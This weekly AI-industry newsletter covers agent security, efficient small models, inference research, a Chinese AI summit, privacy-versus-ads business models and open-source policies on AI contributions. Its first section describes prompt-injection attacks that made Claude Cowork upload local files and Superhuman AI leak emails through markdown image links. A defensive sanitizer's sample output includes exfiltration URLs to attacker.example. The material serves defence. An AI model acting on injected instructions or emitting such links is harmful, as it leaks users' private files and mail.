January 18, 2026

Week 3, 2026

Papers, releases, and things you might have missed.

The infrastructure layer is cracking open. Two assumptions are breaking down simultaneously: that security can be bolted onto agents after deployment, and that the US-China compute gap tells the whole story. Chinese labs are being remarkably honest about their constraints. American platforms are choosing between ads and encryption. And institutions everywhere are learning that your agent is an asset while everyone else’s agent output is a liability.


Agent Security Is Conceptually Wrong

The security model for AI agents is conceptually wrong. This week’s exploits against Claude Cowork and Superhuman AI demonstrate that the approach of “give the agent access, then try to restrict what it does” fails as soon as the agent reads adversarial input in the course of doing its job.

PromptArmor researchers forced Claude Cowork to upload local files to an API account they controlled, two days after launch. A separate vulnerability let attackers exfiltrate dozens of emails from Superhuman AI through a markdown image request: the classic pattern, where the assistant’s output contains an image link to an attacker-controlled host with the leaked data encoded in the URL, and the user’s client fetches it automatically.

Both are the same category error in how we’ve been thinking about agent permissions. In each case the agent was granted access first and constrained afterwards, so a single adversarial input turned legitimate access (read files, read mail, render links) into an exfiltration channel.
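As an added example, not code from PromptArmor, Superhuman or Anthropic, here is the client-side check that closes the markdown-image channel: before rendering agent output, every image reference is resolved and anything pointing off an allowlist is stripped, with a query string or an unusually long path on a foreign host flagged as the exfiltration shape. The allowlist, the hostnames, the length threshold and the sample assistant reply are all assumptions constructed for this example.

```python
"""Guard against markdown-image exfiltration in agent output.

Added example, not PromptArmor's, Superhuman's or Anthropic's code.
The allowlist, the domain names and the sample output are all constructed.
"""
from __future__ import annotations
import re
from urllib.parse import urlsplit

# Hosts the rendering client is allowed to fetch images from (assumed).
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Beyond this many characters of path on a non-allowlisted host we treat the
# URL as an encoded payload rather than a plausible image name (assumed).
PAYLOAD_THRESHOLD = 64

# ![alt](url "title") and the raw <img ...> tag many markdown renderers accept.
_MD_IMG = re.compile(r"!\[(?P<alt>[^\]]*)\]\(\s*(?P<url><[^>]*>|[^\s)]+)[^)]*\)")
_HTML_IMG = re.compile(r"<img\b[^>]*>", re.I)
_SRC = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def image_urls(markdown: str) -> list[str]:
    """Every image the client would try to load when rendering this output."""
    urls = [m.group("url").strip("<>") for m in _MD_IMG.finditer(markdown)]
    for tag in _HTML_IMG.findall(markdown):
        src = _SRC.search(tag)
        if src:
            urls.append(src.group(1))
    return urls


def classify_url(url: str) -> str:
    """'allowed'    - allowlisted host, safe to fetch
       'suspicious' - foreign host carrying a query string or a long path:
                      the exfiltration shape, data encoded in the URL
       'blocked'    - any other remote image or a non-http(s) scheme"""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "blocked"  # data:, javascript:, file: - never render from an untrusted agent
    if parts.hostname in ALLOWED_IMAGE_HOSTS:
        return "allowed"
    if parts.query or len(parts.path) > PAYLOAD_THRESHOLD:
        return "suspicious"
    return "blocked"


def sanitize(markdown: str) -> tuple[str, list[tuple[str, str]]]:
    """Rewrite agent output so the client never fetches a non-allowlisted image.

    Returns (safe_markdown, findings); findings lists (verdict, url) for each
    removed image. Removed images become their alt text so the user can see
    that something was there."""
    findings: list[tuple[str, str]] = []

    def md_sub(m: re.Match) -> str:
        url = m.group("url").strip("<>")
        verdict = classify_url(url)
        if verdict == "allowed":
            return m.group(0)
        findings.append((verdict, url))
        return f"[image removed: {m.group('alt') or 'untrusted source'}]"

    def html_sub(m: re.Match) -> str:
        src = _SRC.search(m.group(0))
        url = src.group(1) if src else ""
        verdict = classify_url(url)
        if verdict == "allowed":
            return m.group(0)
        findings.append((verdict, url))
        return "[image removed]"

    safe = _MD_IMG.sub(md_sub, markdown)
    safe = _HTML_IMG.sub(html_sub, safe)
    return safe, findings


# Constructed sample of what a prompt-injected assistant reply might contain:
# one legitimate chart plus two exfiltration attempts.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n\n"
    "![Q3 chart](https://cdn.example.com/charts/q3.png)\n"
    "![](https://attacker.example/i.png?d=U3ViamVjdDogUGF5cm9sbCByZXZpZXc=)\n"
    '<img src="https://attacker.example/' + "a" * 80 + '">\n'
)

if __name__ == "__main__":
    cleaned, found = sanitize(SAMPLE_OUTPUT)
    print(cleaned)
    for verdict, url in found:
        print(verdict, url)
```

The check belongs in the client that renders the output, not in the agent: the agent is the component being manipulated, so its own output is the untrusted input here. A strict allowlist is the real control; the “suspicious” verdict only exists so the log tells you an exfiltration attempt happened rather than a broken image link.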

The response? A scramble to build sandboxing primitives: Sprites, Bubblewrap, Yolobox. Each tries to create isolation at different layers.

What’s telling: these solutions are coming from the community, not the labs shipping the agents.

Anthropic’s Claude Cowork runs in a Linux VM via Apple’s virtualisation framework, but the exfiltration still worked. The isolation was at the wrong abstraction level: a VM boundary stops the guest from touching the host, and says nothing about what a process inside the guest does with the files and the outbound network it was legitimately given.

Watch for “agent-aware” operating systems and container runtimes. The current sandboxing tools are stopgaps. Virtualisation primitives were designed for a different threat model: untrusted code trying to break out of a box, not trusted code being talked into misusing what the box legitimately lets it reach.

The real solution will require rethinking process isolation for a world where the process itself can be socially engineered.


Small Models Are Winning

The assumption that capability requires scale? Dying faster than most realise.

MedGemma 4B jumped from 3% to 38% accuracy on X-ray localisation, outperforming larger general-purpose models on specific clinical imaging tasks.

TranslateGemma beats models twice its size across 55 languages.

Soprano TTS runs at 2000x realtime on a GPU with sub-15ms latency. Pocket TTS runs on a laptop CPU with no GPU required, cloning voices from 5 seconds of audio.

These are architectural innovations that break the assumed coupling between parameter count and performance.

The techniques attack different bottlenecks. Mixture-of-experts routing is like a building full of specialists: each question gets routed to the right expert instead of making everyone answer everything, so only a fraction of the parameters run for any given token. Quantisation stores each weight in fewer bits; distillation trains a small student to reproduce a large teacher’s outputs. Both shrink footprints while preserving most of the capability.
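To make the two bottlenecks concrete, here is an added miniature of both, written for this page rather than taken from any of the models named above: a top-k router that runs only the chosen experts for a token (so active parameters stay constant as you add experts), and symmetric int8 quantisation with its error bound. Dimensions, expert count and all weights are constructed.

```python
"""Mixture-of-experts routing and int8 quantisation in miniature.

Added example; not code from MedGemma, TranslateGemma, Soprano or any other
model named above. Dimensions, expert count and weights are constructed.
"""
import math
import random


def softmax(xs):
    m = max(xs)
    e = [math.exp(x - m) for x in xs]
    s = sum(e)
    return [v / s for v in e]


def matvec(w, x):
    return [sum(a * b for a, b in zip(row, x)) for row in w]


def route(token, router_w, k):
    """Top-k gating: score every expert (one small matvec), keep the k
    highest and renormalise their gates so they sum to one."""
    scores = softmax(matvec(router_w, token))
    top = sorted(range(len(scores)), key=scores.__getitem__, reverse=True)[:k]
    z = sum(scores[i] for i in top)
    return [(i, scores[i] / z) for i in top]


def moe_forward(token, router_w, experts, k=2):
    """Only the k routed experts run for this token; the rest cost nothing.
    Returns (output vector, number of expert weights actually multiplied)."""
    out = [0.0] * len(token)
    touched = 0
    for i, gate in route(token, router_w, k):
        y = matvec(experts[i], token)
        out = [o + gate * v for o, v in zip(out, y)]
        touched += len(experts[i]) * len(experts[i][0])
    return out, touched


def quantize_int8(weights):
    """Symmetric per-tensor int8: 4 bytes per float32 weight become 1 byte
    plus a single float scale. Worst-case rounding error is scale/2."""
    scale = max(abs(w) for w in weights) / 127 or 1.0
    q = [max(-127, min(127, round(w / scale))) for w in weights]
    return q, scale


def dequantize_int8(q, scale):
    return [v * scale for v in q]


def build_layer(d=4, n_experts=8, seed=0):
    """Constructed weights: a router (n_experts x d) and n_experts d x d experts."""
    rng = random.Random(seed)

    def rand_matrix(rows, cols):
        return [[rng.uniform(-1, 1) for _ in range(cols)] for _ in range(rows)]

    return rand_matrix(n_experts, d), [rand_matrix(d, d) for _ in range(n_experts)]


def demo(d=4, n_experts=8, k=2):
    router_w, experts = build_layer(d, n_experts)
    token = [math.sin(i) for i in range(d)]          # constructed input vector
    _, active = moe_forward(token, router_w, experts, k)
    total = sum(len(e) * len(e[0]) for e in experts)
    flat = [w for e in experts for row in e for w in row]
    q, scale = quantize_int8(flat)
    err = max(abs(a - b) for a, b in zip(flat, dequantize_int8(q, scale)))
    return {
        "active_expert_params": active,   # k * d * d, independent of n_experts
        "total_expert_params": total,     # n_experts * d * d
        "bytes_fp32": 4 * len(flat),
        "bytes_int8": len(flat) + 4,      # plus one float32 scale
        "max_quant_error": err,
        "error_bound": scale / 2,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Adding experts raises total capacity (and memory) without raising per-token compute, which is the trade the text describes; per-tensor quantisation is the crudest variant, and production models use per-channel or per-group scales to keep the error bound tighter for the same byte count.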

So what’s happening? Sophisticated AI capabilities are escaping the datacenter.

When a TTS model runs at 2000x realtime, or a medical diagnostic model fits on a phone, the economics of deployment change. You don’t need to send sensitive data to a cloud API anymore. The moat shifts from “who can afford the most H100s” to “who can architect the most efficient systems.”


Inference Is the New Frontier

Three papers from different teams, published within weeks of each other, all converging on the same idea: stop cramming everything into training.

Test-Time Training from Stanford and NVIDIA. They treat the input itself as a training dataset. Instead of frozen weights processing your context, the model briefly learns from your specific input before generating a response.

Think of it as skimming the textbook chapter right before the exam.

The result: 35x faster inference at 2M context, with constant latency regardless of context length.

Recursive Language Models take a different approach: context folding. Rather than expanding context windows indefinitely, RLM compresses and recurses. Write a summary of each chapter, work from summaries instead of re-reading everything.

That gets you inputs 100x larger than native context windows.
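The folding loop itself is short enough to show. This is an added illustration of the idea, not the RLM authors’ code: a deterministic extractive summariser stands in for the model so the example runs offline, the corpus is constructed, and the window size and compression ratio are assumptions. What it demonstrates is the invariant that matters: no single summariser call ever sees more than one window, however long the input.

```python
"""Context folding in miniature.

Added example illustrating the RLM idea above; not the RLM authors' code.
The summariser is a deterministic extractive stand-in so the example runs
offline; in the real system a language model writes each summary.
The corpus is constructed.
"""


def chunk(tokens, window):
    """Split the token list into pieces that each fit in one context window."""
    return [tokens[i:i + window] for i in range(0, len(tokens), window)]


def extractive_summary(tokens, budget):
    """Stand-in summariser: keep tokens that look like facts (numbers and
    capitalised names), in order, and cut to the budget."""
    facts = [t for t in tokens if t[:1].isdigit() or t[:1].isupper()]
    return facts[:budget]


def fold(tokens, window, summarise, ratio=4, trace=None):
    """Summarise chunk by chunk, then recurse on the summaries, until the
    whole input fits in one window.

    Each summariser call sees at most `window` tokens, so the model's native
    context limit is never exceeded no matter how long the input is.
    Returns (final tokens, folding depth)."""
    depth = 0
    while len(tokens) > window:
        chunks = chunk(tokens, window)
        tokens = [t for c in chunks for t in summarise(c, window // ratio)]
        depth += 1
        if trace is not None:
            trace.append((depth, len(chunks), len(tokens)))
    return tokens, depth


def build_corpus(n_chapters=100):
    """Constructed input: 16 tokens per chapter, 1600 tokens for 100 chapters."""
    tokens = []
    for i in range(n_chapters):
        tokens += (f"Chapter {i} reports {3 * i} incidents in Region{i} "
                   "during the quarter and notes that staffing was stable").split()
    return tokens


def demo(window=160):
    """Fold a 1600-token corpus through a 160-token window (input 10x the
    window). Also records the largest input any summariser call saw."""
    seen = {"max_input": 0}

    def tracked_summary(tokens, budget):
        seen["max_input"] = max(seen["max_input"], len(tokens))
        return extractive_summary(tokens, budget)

    trace = []
    final, depth = fold(build_corpus(), window, tracked_summary, trace=trace)
    return {
        "input_tokens": 1600,
        "final_tokens": len(final),
        "depth": depth,
        "trace": trace,                 # (depth, chunks summarised, tokens after)
        "max_summariser_input": seen["max_input"],
        "final": final,
    }


if __name__ == "__main__":
    r = demo()
    print(r["trace"], r["max_summariser_input"])
    print(" ".join(r["final"][:12]), "...")
```

Folding is lossy by construction: whatever the summariser drops is gone, and the decision about what to keep is made by a model reading text it does not control, so an input that shapes the summaries shapes everything downstream. That is the same trust problem the agent section describes, one layer down.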

Engram is DeepSeek’s latest research, published this month. It introduces a conditional memory module that separates static knowledge retrieval from active reasoning. Expected to ship in V4 next month.

Knowledge that doesn’t need to be “reasoned about” gets looked up instantly. Flashcards, not derivation.

The module scales capacity to 27B parameters without increasing per-token compute.

The shared thesis: inference is where the action is. Training gives you a foundation, but the real intelligence happens when the model encounters your specific problem.


What Chinese AI Leaders Actually Think

A rare window into Chinese AI strategy opened this week. Leaders from Zhipu, Moonshot, Qwen, and Tencent convened at Tsinghua University’s AGI-Next summit.

The conversation was remarkably candid. The picture complicates the simple “China is catching up” narrative.

The compute gap is larger than public benchmarks suggest.

Lin Junyang, tech lead for Alibaba’s Qwen, put it bluntly: US compute exceeds China’s by one to two orders of magnitude.

But the more telling constraint isn’t total GPUs. It’s allocation. American labs pour compute into research. Chinese labs spend theirs fulfilling delivery requirements.

“Just fulfilling delivery already consumes the vast majority of our compute,” Lin said.

The gap isn’t hardware. It’s freedom to experiment.

The cultural diagnosis was sharper still.

Yao Shunyu, now at Tencent after OpenAI, identified the core issue: China has an enormous number of very strong talents. Once something is proven doable, many people enthusiastically try it and want to do it even better. What China may still lack is enough people willing to break new paradigms or take very risky bets.

Pretraining is hard but known. Exploring long-term memory or continual learning means not knowing if it can even be done.

DeepSeek emerged as the counterexample everyone cited approvingly.

What makes them different? “DeepSeek cares less about benchmark scores and more about two questions: what is actually the right thing to do, and what feels genuinely good in real use.”

In a culture Yao described as obsessed with leaderboards and numerical metrics, that’s a meaningful divergence.

So what are the odds the world’s leading AI company will be Chinese in three to five years?

Lin gave 20%. Not pessimism. Realism.

“Is innovation spurred by the rich or the poor?” he asked. “The poor are not without opportunities. When you’re poor, things like algorithm-infrastructure co-optimisation become necessary.”

Export restrictions have forced this pivot from brute-force scaling to extreme algorithmic efficiency. Though the policy is shifting (Trump just approved H200 sales to China with a 25% tariff), the efficiency-first mindset is already embedded in Chinese research culture.

Consumer AI in China is thriving: Doubao, Kimi, ChatGPT clones. Enterprise AI struggles. Willingness to pay is lower, the business culture less supportive. Several speakers pointed to Palantir as the model Chinese enterprise AI should study.

The summit offered something rarely visible: Chinese AI leaders being honest about their constraints rather than performing confidence. That’s worth something.


The Privacy-Monetisation Fork

OpenAI is adding ads to ChatGPT, subsidising inference by monetising attention. Google is integrating Gemini with your Gmail and Photos, leveraging data they already have. Moxie Marlinspike launched an end-to-end encrypted AI platform, betting users will pay to keep their prompts private.

The paradox is structural.

AI becomes dramatically more useful with access to your personal context: your emails, your photos, your documents, your habits. That access creates both a privacy risk and a monetisation opportunity.

OpenAI’s infrastructure costs are enormous. Advertising is the obvious subsidy model. Google already has your data. Gemini integration is the natural next step.

Both paths lead to AI systems optimised to know you well enough to serve you ads, not just answers.

Confer, Marlinspike’s platform, takes a different approach. It uses Trusted Execution Environments (hardware that runs code in a locked box where even the provider can’t peek inside) so the provider cannot see your prompts. The box is only as good as its attestation: before sending anything, the client has to verify that the enclave is running exactly the code that was audited, and the whole arrangement rests on the CPU vendor’s keys.

Technically elegant. Economically challenging. If you can’t see user data, you can’t monetise it.
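What that attestation step looks like from the client’s side, as an added example and not Confer’s protocol or code: the client challenges the enclave with a fresh nonce, checks the returned quote against the vendor key, the nonce and the audited measurement, and sends the prompt only if all three pass. The quote format, the HMAC standing in for the hardware’s asymmetric attestation signature, the keys and the measurements are all constructed for this illustration.

```python
"""Client-side attestation gate for a TEE-hosted model.

Added example showing what "the provider cannot see your prompts" depends on.
Not Confer's protocol or code: the quote format, the HMAC stand-in for the
hardware's attestation signature, the keys and the measurements are all
constructed for this illustration.
"""
import hashlib
import hmac
import json
import os

# Stand-in for the CPU vendor's attestation key. Real TEEs sign quotes with an
# asymmetric key fused into the hardware and the client needs only the vendor's
# public key; a shared HMAC key is used here only to keep the example offline.
VENDOR_KEY = b"constructed-vendor-attestation-key"

# Hash of the inference server build that was independently audited (constructed).
AUDITED_MEASUREMENT = hashlib.sha256(b"inference-server-v1").hexdigest()


def sign_quote(body: dict, key: bytes) -> dict:
    raw = json.dumps(body, sort_keys=True).encode()
    return {"body": body, "sig": hmac.new(key, raw, hashlib.sha256).hexdigest()}


def verify_quote(quote: dict, expected_measurement: str, nonce: str,
                 vendor_key: bytes = VENDOR_KEY) -> tuple:
    """All three checks must pass before a prompt leaves the device: the quote
    is from the hardware, it is fresh, and the code is the audited code."""
    raw = json.dumps(quote["body"], sort_keys=True).encode()
    expected_sig = hmac.new(vendor_key, raw, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected_sig, quote["sig"]):
        return False, "signature: quote was not produced by the hardware"
    if quote["body"].get("nonce") != nonce:
        return False, "nonce: stale or replayed quote"
    if quote["body"].get("measurement") != expected_measurement:
        return False, "measurement: enclave is not running the audited code"
    return True, "ok"


class Enclave:
    """Provider side. `measurement` is what the hardware reports for the code
    actually loaded; the provider cannot pick it, and only the vendor key
    can sign it."""

    def __init__(self, code: bytes, signing_key: bytes = VENDOR_KEY):
        self.measurement = hashlib.sha256(code).hexdigest()
        self.signing_key = signing_key

    def attest(self, nonce: str) -> dict:
        return sign_quote({"measurement": self.measurement, "nonce": nonce},
                          self.signing_key)

    def handle(self, prompt: str) -> str:
        return f"[reply to {len(prompt)} chars]"


class ReplayingEnclave(Enclave):
    """Attacker variant: serves a quote captured earlier instead of a fresh one."""

    def __init__(self, captured_quote: dict):
        self.captured = captured_quote

    def attest(self, nonce: str) -> dict:
        return self.captured


def send_prompt(enclave, prompt: str, expected: str = AUDITED_MEASUREMENT) -> tuple:
    """Client: challenge with a fresh nonce, verify, and only then send."""
    nonce = os.urandom(16).hex()
    ok, why = verify_quote(enclave.attest(nonce), expected, nonce)
    if not ok:
        return None, why          # the prompt never leaves the device
    return enclave.handle(prompt), why


def demo() -> dict:
    honest = Enclave(b"inference-server-v1")
    modified = Enclave(b"inference-server-v1+prompt-logging")          # provider added logging
    forged = Enclave(b"inference-server-v1", signing_key=b"not-the-vendor")  # fake quote
    replay = ReplayingEnclave(honest.attest("old-nonce"))
    prompt = "what does my contract say about notice periods?"
    return {name: send_prompt(e, prompt)
            for name, e in [("honest", honest), ("modified", modified),
                            ("forged", forged), ("replay", replay)]}


if __name__ == "__main__":
    for name, (reply, why) in demo().items():
        print(f"{name:9} -> {reply!r} ({why})")
```

The practical questions are where `AUDITED_MEASUREMENT` comes from and who checked it: the privacy claim is only as strong as the client’s ability to reproduce the build it is comparing against, and any provider-side update to the server silently becomes the “modified” case until the new measurement has been reviewed.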

The encrypted AI future has two branches. One requires users to pay a premium for privacy in the cloud. That’s Confer’s bet. The other skips the cloud entirely. When capable models run on your device, there’s no provider to trust or distrust. The small models escaping the datacenter aren’t just an efficiency story. They’re a privacy story too.


Institutions Are Developing Antibodies

Organisations are developing immune responses to AI.

Tldraw paused external contributions after 30+ AI-generated pull requests in a single week: incomplete context, misunderstanding of the codebase, no follow-up. “This is going to be a weird year for programmers and open source especially,” maintainer Steve Ruiz wrote.

The responses are fragmenting. Some projects ban AI outright: QEMU declines anything “believed to include AI generated content,” NetBSD considers it “presumed tainted.” Others favour disclosure: Apache recommends “Generated-by:” tags, the Linux kernel’s draft guidelines push transparency over prohibition.

Torvalds dismisses both extremes: “There is zero point in talking about AI slop—that’s just plain stupid.” Documentation requirements are “posturing.” Bad actors won’t disclose anyway. His position: treat it as a tool, let human review be the gatekeeper.

But the concern was never just quality. QEMU’s objection is provenance: “You cannot declare where the bot got the code from.” Can you sign the Developer Certificate of Origin for code you didn’t fully write? Red Hat says yes: DCO never required personal authorship of every line. QEMU disagrees. That legal uncertainty doesn’t resolve with better models.

Meanwhile, quality is improving. 59% of developers report AI improves their code, Microsoft runs AI review on 600K+ PRs monthly. But sophisticated AI use is now nearly undetectable. If you can’t spot it, bans are performative.

The practical question: where do you draw the trust boundary? Which processes tolerate AI input without review? Which require verification? Which exclude AI for legal clarity? These boundaries are organisation-specific, shifting constantly. Establishing them explicitly, before quality failures do it for you, is the design challenge.


What It Means

The security model is broken. Agent sandboxing isn’t a deployment checkbox. It’s a new category of infrastructure that doesn’t fully exist yet. Treat agents like untrusted contractors with clipboards. Assume they will eventually execute adversarial instructions.

The moat is shifting. From “who has the most GPUs” to “who can architect the most efficient systems.” Small models beating large ones on specific tasks isn’t a fluke. Revisit what actually needs cloud inference. The model that was too large six months ago may now fit on edge hardware.

Inference is the new leverage point. If you’re evaluating models, benchmark context window efficiency, not just length. The cost-per-token at scale matters more than peak capability on benchmarks.

Monetisation is forking. Ads vs encryption vs edge. Free-with-privacy-tradeoffs vs paid-with-guarantees vs local-with-no-cloud. The platforms you build on will determine which world your users live in.

Draw your trust boundary explicitly. Which processes can tolerate AI input without review? Which require verification? Which should exclude AI entirely? Decide now, and revisit constantly, before quality failures decide for you.


Worth Your Time

If you read three things:

  1. ChinaTalk - The All-Star Chinese AI Conversation - The full AGI-Next summit transcript. The candor is rare and worth the length.

  2. NVIDIA Blog - Test-Time Training - The clearest explanation of why inference-time compute matters and how TTT works.

  3. PromptArmor - Claude Cowork Exfiltration - Detailed technical breakdown of what went wrong and why it matters for agent security.